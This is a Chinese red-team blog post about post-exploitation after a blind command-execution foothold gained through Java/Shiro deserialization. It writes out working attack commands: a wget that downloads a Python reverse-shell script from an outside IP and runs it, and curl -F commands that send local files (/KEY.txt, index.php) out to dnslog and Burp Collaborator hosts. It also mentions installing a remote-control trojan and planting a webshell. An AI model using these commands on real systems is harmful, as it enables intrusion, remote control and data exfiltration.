反弹shell     Tips     无回显     命令执行    

「Tips」命令执行无回显无法反弹shell的后续操作

973 次访问
leader
Scroll Down

我一般在遇到Java反序列化可以命令执行后,会选择用python的方式反弹shell。

先wget下载

wget http://123.123.123.123/shell.py -O /tmp/shell.py

然后再执行

python /tmp/shell.py

这样一般不用去考虑符号带来的编码问题了。虽然要繁琐些。。。

Windows的直接下载远控马再执行。

但是之前比赛又一次遇到一个shiro反序列化

可以命令执行wget命令,但是反弹shell始终不行,即使有连接,但是没有启起来终端sh。

发现curl命令也没有,于是就安装一个

yum -y instal  curl

运气也是好,后来发现是root权限。

安装后可以正常curl到外边。

但到这里我就卡住了,只能命令执行,而且没有回显。

于是想起了curl可以使用-F 参数(具体的百度)来post本地文件,那么我只要执行命令重定向到一个文本中,然后再curl外带出来,就可以看到执行结果。

`curl -F shl=@/KEY.txt 76ihvf.ceye.io`


利用burp的dnslog
curl -X POST -F xx=@index.php http://8clb1g723ior2vyd7sbyvcx6vx1ppe.burpcollaborator.net

这样做虽然的确很麻烦,但是至少我能看到回显内容,然后来判断当前路径和权限,接着就可以找到网站根目录来wget下载webshell。

© 本文著作权归作者所有,转载前请务必署名

最新文章
mac Big Sur系统 mvn打包报错:No compiler is provided in this environment. Perhaps you are running on a JRE

转载来自:https://blog.csdn.net/w605283073/article/details/111770386一、背景最近将mac升级到BigSur版本,出现了个别奇奇怪怪的小问题。系统升级后执行mvn命令,总是出现以下错误:Nocompilerisprovidedinthisenv
「转」MSSQL CLR 执行命令

https://www.cnblogs.com/websecyw/p/11888947.html首先创建一个dll,dll的功能命令执行代码usingSystem;usingSystem.Data;usingSystem.Diagnostics;usingSystem.Data.SqlTypes;u
Homebrew 国内镜像源

Homebrew国内镜像源腾讯云的速度比较快替换brew.git:gitremoteset-urloriginhttps://mirrors.cloud.tencent.com/homebrew/brew.git替换homebrew-core.git:gitremoteset-urloriginht
2020年总结

这一年里你参加了7场攻防演练,平均每场演练拿到了一万分,其中九千分都是靠shack2超级弱口令扫描爆破打下来的,你热衷于使用goby和shack2超级弱口令爆破,常常戏称自己是内网渗透大牛。喜欢和朋友讨论今年攻防演练又靠shiro,fastjson,weblogic混过了一年。你热爱学习,每天都会打
[转载]远程命令执行类漏洞传输Webshell或文件等多种方案

本文由简悦SimpRead转码,原文地址xiashang.xyz在红蓝对抗中,远程命令执行类漏洞往往是攻击方在正面路径中突破边界非常青睐的。常见的可以执行远程命令的漏洞的有各种JAVA反序列化漏洞、远程代码执行漏洞、远程命令执行漏洞(原生)、表达式执行漏洞、SQL注入漏洞等。远程命令执行类漏洞从漏洞
分类
解题思路 writeup
工具 1593115068035
小技巧 1590506915066
漏洞复现 vulnhub
杂记 1578377560604
权限维持 1577677481988
Bypass bypass
ATT&CK attck
红蓝对抗 redteam
标签
mvn mvn
CLR clr
MSSQL mssql
Homebrew homebrew
2020年总结 2020年总结
传输Webshell 传输webshell
远程命令执行 远程命令执行
Webshell webshell
JNDI jndi
CVE-2020-14645 cve-2020-14645
内存马 内存马
解题思路 解题思路
墨者学院 墨者学院
Defcon 2020 defcon2020
CVE-2020-14882 cve-2020-14882
导出lsass 导出lsass
DumpPassword dumppassword
Chrome浏览器密码导出 chrome浏览器密码导出
Decrypt-pass decrypt-pass
Decrypt-Chrome-pass decrypt-chrome-pass
Chrome chrome
Shellcode shellcode
免杀 免杀
cobaltstrike远控 cobaltstrike远控
CS cs
cobaltstrike cobaltstrike
反序列化漏洞 反序列化漏洞
Fastjson反序列化漏洞 fastjson反序列化漏洞
Fastjson fastjson
frp代理钉钉通知 frp代理钉钉通知
frp代理软件 frp代理软件
frp frp
无文件 无文件
回显 回显
Shiro反序列化 shiro反序列化
Shiro shiro
微信解密 1593115099474
微信聊天记录解密 1593115099470
命令执行 1590506843774
Tips tips
无回显 1590506843757
CNVD-2020-10487 cnvd-2020-10487
Tomcat幽灵猫 tomcat
CVE-2020-1938 cve-2020-1938
实战 1588140261114
通达OA oa
CVE-2020-2555 cve-2020-2555
漏洞复现 1587026226930
CVE-2020-2551 cve-2020-2551
Weblogic weblogic
2019 2019
总结 1578377564263
记录SSH密码 ssh
权限维持 1577677497553
Linux linux
红队 1577245982632
T1003 t1003
Credential Dumping credential-dumping
抓取密码 1577242318501
Mimikatz mimikatz
ProcDump procdump
Simple-Loader simple-loader
T1223 t1223
CHM chm
绕过windows defender windows-defender
att&ck attck
MSbuild msbuild
远控上线 1576224996894
过360 360
反弹shell shell
PowerShell powershell
BypassAV bypassav
PowerLine powerline